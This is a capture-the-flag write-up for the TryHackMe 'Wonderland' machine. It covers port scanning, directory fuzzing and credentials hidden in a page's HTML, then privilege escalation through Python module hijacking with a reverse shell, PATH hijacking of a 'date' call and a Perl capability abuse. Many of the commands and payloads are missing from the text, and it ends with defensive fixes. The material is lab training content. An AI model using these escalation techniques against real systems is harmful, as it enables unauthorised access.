
Writeup - Wonderland (THM)


This is a writeup for the Wonderland machine from the TryHackMe site.


First, let’s start with a scan of our target with the following command:

nmap -sV -T4 -Pn

Two TCP ports are discovered:

  • 22/tcp : SSH port (OpenSSH 7.6p1)
  • 80/tcp : HTTP web server


I start by scanning the pages of the site:

When I go to the r page, I see the following message:

So I do a recursive scan to see the complete tree:

ffuf -c -u -w wordlist/common.txt -recursion -recursion-depth 6

I finally find the following page:

I look at the source code of the page and find a p tag with a style that does not display it. The content of this tag looks very much like credentials…

<!DOCTYPE html>

    <title>Enter wonderland</title>
    <link rel="stylesheet" type="text/css" href="/main.css">

    <h1>Open the door and enter wonderland</h1>
    <p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
    <p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
    <p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
        the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
    <p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
    <img src="/img/alice_door.png" style="height: 50rem;">

So I try to connect via SSH:

I now have a shell and can retrieve the first flag.

alice@wonderland:~$ cat /root/user.txt
thm{"Curiouser and curiouser!"}

Privilege escalation

Looking at the contents of the home folder, I find several users:

alice@wonderland:/home$ ls
alice  hatter  rabbit  tryhackme

I now look at my sudo permissions:

So I can run this Python script with the rabbit user’s permissions. So I look at the content of this script:

import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
And that was scarcely odd, because
They’d eaten every one."""

for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)

I run it to make sure I’ve got it right.

So it’s a script that prints 10 random lines from the text included in the script. Interestingly, the script imports the random module, and Python searches the script’s own folder first when resolving imports. So I create a file in the same folder in which I insert a reverse shell. When the script is executed, it should use our file! So I create this new file with the following content:

import pty

I now run the script with the following command:

In the folder of this new user, we find the file teaParty. Using the strings command, I can find the following readable text:

Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him

The program calls the date command but, unlike /bin/echo, it does so without an absolute path. So I’ll be able to create a script with the same name, and then add the folder that contains this new script to the $PATH variable.

I start by creating the script with the following content:


Then I add execute permission and put my personal folder at the beginning of the PATH variable.

chmod +x date
export PATH=/home/rabbit:$PATH

I can now run the program:

In the personal folder of this new user I find the following file:

hatter@wonderland:/home/hatter$ ls
hatter@wonderland:/home/hatter$ cat password.txt 

So I try to connect via SSH with this password:

After some research to do a privilege elevation I find nothing. So I try to run By analyzing the output of the command I find the following lines:

On the GTFOBins page for Perl, I find a way to escalate privileges.

Using the following command, I get a root shell and I can get the last flag.


To patch this host I think it would be necessary to perform a number of actions:

  • Do not leave passwords in HTML code
  • Use absolute paths in programs
  • Do not leave cleartext passwords in files
  • Modify Perl permissions to avoid elevation of privilege.

